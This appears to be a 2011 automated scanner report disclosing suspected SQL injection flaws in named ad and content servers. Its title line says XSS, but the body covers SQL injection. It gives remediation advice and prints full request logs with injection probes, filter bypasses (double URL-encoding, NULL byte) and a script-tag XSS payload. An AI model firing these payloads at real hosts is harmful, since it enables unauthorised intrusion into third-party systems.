XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09172011-03

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://ad.doubleclick.net/adj/DY146/ron_lifestyle [sz parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adj/DY146/ron_lifestyle

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/DY146/ron_lifestyle;sz=300x250;ord=2310888?%2527 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 3564
Set-Cookie: id=c2102423c000027||t=1316277512|et=730|cs=002213fd48cb8966602b2a269f; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:38:32 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:38:32 GMT
Date: Sat, 17 Sep 2011 16:38:31 GMT
Expires: Sat, 17 Sep 2011 16:38:31 GMT
Cache-Control: private

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714;sz=1x1;pc=[TPAS_ID];click=;ord=4397376?\" WIDTH=1 HEIGHT=1 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPAC
...[SNIP]...
033469%3B4307-300/250%3B42867329/42885116/1%3B%3B%7Esscs%3D%3fhttp://www.eyewonderlabs.com/ct2.cfm?ewbust=0&guid=0&ewadid=147002&eid=1465331&file=http://cdn.eyewonder.com/100125/769319/1465331/NOSCRIPTfailover.jpg&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B246333486%3B0-0%3B0%3B46033469%3B4307-300/250%3B42
...[SNIP]...

Request 2

GET /adj/DY146/ron_lifestyle;sz=300x250;ord=2310888?%2527%2527 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1712
Set-Cookie: id=cd801423c0000f8||t=1316277513|et=730|cs=002213fd485921263baaebd341; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:38:33 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:38:33 GMT
Date: Sat, 17 Sep 2011 16:38:33 GMT
Expires: Sat, 17 Sep 2011 16:38:33 GMT
Cache-Control: private

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714.2;sz=300x250;pc=[TPAS_ID];click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/p%3B246333480%3
...[SNIP]...

1.2. http://ad.doubleclick.net/adj/hdm.quicksimple/other/ [id cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.doubleclick.net
Path:	/adj/hdm.quicksimple/other/

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/hdm.quicksimple/other/;sz=728x90,1000x124;tile=1;pos=1;site=quicksimple;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;mtfIFPath=/cm/shared/admeld/;game=;ord=2083708371501416? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00'

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7122
Set-Cookie: id=c6bf8413c00006d||t=1316277322|et=730|cs=002213fd4847ac9fe262429b03; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:35:22 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:35:22 GMT
Date: Sat, 17 Sep 2011 16:35:22 GMT
Expires: Sat, 17 Sep 2011 16:35:22 GMT
Cache-Control: private

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 278
Set-Cookie: id=c7bf8413c0000a6||t=1316277323|et=730|cs=002213fd4830959e95967a6e6c; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:35:23 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:35:23 GMT
Date: Sat, 17 Sep 2011 16:35:23 GMT
Expires: Sat, 17 Sep 2011 16:35:23 GMT
Cache-Control: private

document.write('');

admeld_publisher = 303;
admeld_site = 'hearst_us';
admeld_size = '728x90';
admeld_placement = 'quickandsimple_us';

document.write('\n<script type=\"text/javascript
...[SNIP]...

1.3. http://api.uproxx.com/ulink/feed [c_cats parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://api.uproxx.com
Path:	/ulink/feed

Issue detail

The c_cats parameter appears to be vulnerable to SQL injection attacks. The payloads 16216981'%20or%201%3d1--%20 and 16216981'%20or%201%3d2--%20 were each submitted in the c_cats parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ulink/feed?pid=163&limit=12&c_cats=3,15,17,16216981'%20or%201%3d1--%20&uw_nsfw=false&format=json HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e21911b30cf3ed12536b7b3e176e20ab

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:49 GMT
Server: Apache
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4563

UPROXXJSON(
[{"category":"Web Culture","content_title":"UPROXX Interview With Charlie Day","image_url":"http:\/\/ua.uproxxcdn.com\/6PxEor9uKEjF6Lm.jpg","content_clicks":"10999","source_title":"Uproxx"
...[SNIP]...
e_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.camelclutchblog.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u106377o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Black Ops Freak Out!","image_url":"http:\/\/ua.uproxxcdn.com\/5i4Q0VYMyo7fr8O.jpg","content_clicks":"3195","source_title":"Chru Dat","source_url":"http:\/\/www.chrudat.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.chrudat.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u106685o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Anime Expo 2011 Video Game Cosplay","image_url":"http:\/\/ua.uproxxcdn.com\/WYgN5RE569G2Jjs.png","content_clicks":"29353","source_title":"G4TV","source_url":"http:\/\/g4tv.com\/","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=g4tv.com","content_link":"http:\/\/widget.uproxx.com\/t\/1a101711o163"},{"category":"Web Culture","content_title":"The 15 Best Singing Performances In Non-musical Fi","image_url":"http:\/\/ua.uproxxcdn.com\/idlhYruu5wciG76.jpg","content_clicks":"11","source_title":"BuzzFeed","source_url":"http:\/\/www.buzzfeed.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.buzzfeed.com","content_link":"http:\/\/widget.uproxx.com\/t\/1r107997o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Internet Browsers As Pretty Ladies","image_url":"http:\/\/ua.uproxxcdn.com\/XNo3uSJmW62dTv1.jpg","content_clicks":"190","source_title":"NextRound","source_url":"http:\/\/nextround.net","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=nextround.net","content_link":"http:\/\/widget.uproxx.com\/t\/1r107802o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Oh, Tom Brady: Your Pretty Mouth Was Never Meant F","image_url":"http:\/\/ua.uproxxcdn.com\/XLGjl6SZe8fykLv.jpg","content_clicks":"45","source_title":"Pajiba","source_url":"http:\/\/www.pajiba.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.pajiba.com","content_link":"http:\/\/widget.uproxx.com\/t\/1r107973o163"},{"category":"Web Culture","content_title":"The 50 Most Entertaining Sh**ty Movies","image_url":"http:\/\/ua.uproxxcdn.com\/CXBetoHkoRG7G0E.png","con
...[SNIP]...

Request 2

GET /ulink/feed?pid=163&limit=12&c_cats=3,15,17,16216981'%20or%201%3d2--%20&uw_nsfw=false&format=json HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e21911b30cf3ed12536b7b3e176e20ab

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:49 GMT
Server: Apache
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4548

UPROXXJSON(
[{"category":"Web Culture","content_title":"UPROXX Interview With Charlie Day","image_url":"http:\/\/ua.uproxxcdn.com\/6PxEor9uKEjF6Lm.jpg","content_clicks":"10999","source_title":"Uproxx"
...[SNIP]...
e_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.camelclutchblog.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u106377o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Pokeball Bras Are A Thing","image_url":"http:\/\/ua.uproxxcdn.com\/4ppTtVOloDM8xzC.jpg","content_clicks":"98100","source_title":"Chru Dat","source_url":"http:\/\/www.chrudat.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.chrudat.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u101223o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Awesome Attack of the Show Wonder Woman Cosplay","image_url":"http:\/\/ua.uproxxcdn.com\/XVkDdOxfJroEaBO.png","content_clicks":"7441","source_title":"G4TV","source_url":"http:\/\/g4tv.com\/","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=g4tv.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u103599o163"},{"category":"Web Culture","content_title":"25 Inane Zooeyisms","image_url":"http:\/\/ua.uproxxcdn.com\/r63wMetmtJgpwY8.jpg","content_clicks":"2397","source_title":"BuzzFeed","source_url":"http:\/\/www.buzzfeed.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.buzzfeed.com","content_link":"http:\/\/widget.uproxx.com\/t\/1a106792o163"},{"category":"Web Culture","content_title":"Photoshop: You Know What to Do","image_url":"http:\/\/ua.uproxxcdn.com\/n1gKAfQZb9Flva6.png","content_clicks":"20690","source_title":"NextRound","source_url":"http:\/\/nextround.net","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=nextround.net","content_link":"http:\/\/widget.uproxx.com\/t\/1u105974o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Let's Pour Some Out For The Stars Who Never Were","image_url":"http:\/\/ua.uproxxcdn.com\/3Ob3olsyCseRJwE.jpg","content_clicks":"3231","source_title":"Pajiba","source_url":"http:\/\/www.pajiba.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.pajiba.com","content_link":"http:\/\/widget.uproxx.com\/t\/1r104591o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Marisa Miller Gets R.I.P.D.","image_url":"http:\/\/ua.uproxxcdn.com\/kkkLAbmhiJFVLSE.png","content_clicks":"12363","sou
...[SNIP]...

1.4. http://hfm.checkm8.com/adam/detect [&LOC parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hfm.checkm8.com
Path:	/adam/detect

Issue detail

The &LOC parameter appears to be vulnerable to SQL injection attacks. The payloads 18653300'%20or%201%3d1--%20 and 18653300'%20or%201%3d2--%20 were each submitted in the &LOC parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=118653300'%20or%201%3d1--%20&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:38 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wSL3KUv9UJ7MTba;Path=/;
Set-cookie: C=okL6Y9wbG5Y1caaJaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:23:58 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156333621/1230474426/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=118653300'%20or%201%3d2--%20&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:38 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: C=okL6Y9wbG5Y1caaKaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:23:58 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156333621/1230474426/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.5. http://hfm.checkm8.com/adam/detect [HEIGHT parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hfm.checkm8.com
Path:	/adam/detect

Issue detail

The HEIGHT parameter appears to be vulnerable to SQL injection attacks. The payloads 21414440%20or%201%3d1--%20 and 21414440%20or%201%3d2--%20 were each submitted in the HEIGHT parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087&HEIGHT=87021414440%20or%201%3d1--%20&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:45 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wCJ38Sv9UJ7MTba;Path=/;
Set-cookie: C=orL6Y9wx3NQ0caabbSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:04 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228210170/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087&HEIGHT=87021414440%20or%201%3d2--%20&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:45 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=orL6Y9wx3NQ0caacbSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:04 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228210170/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.6. http://hfm.checkm8.com/adam/detect [WIDTH parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://hfm.checkm8.com
Path:	/adam/detect

Issue detail

The WIDTH parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the WIDTH parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087%20and%201%3d1--%20&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:42 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wCJ38Sv9UJ7MTba;Path=/;
Set-cookie: C=onL6Y9wx3NQ0caaYaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:01 GMT;
x-internal-browser: CH0
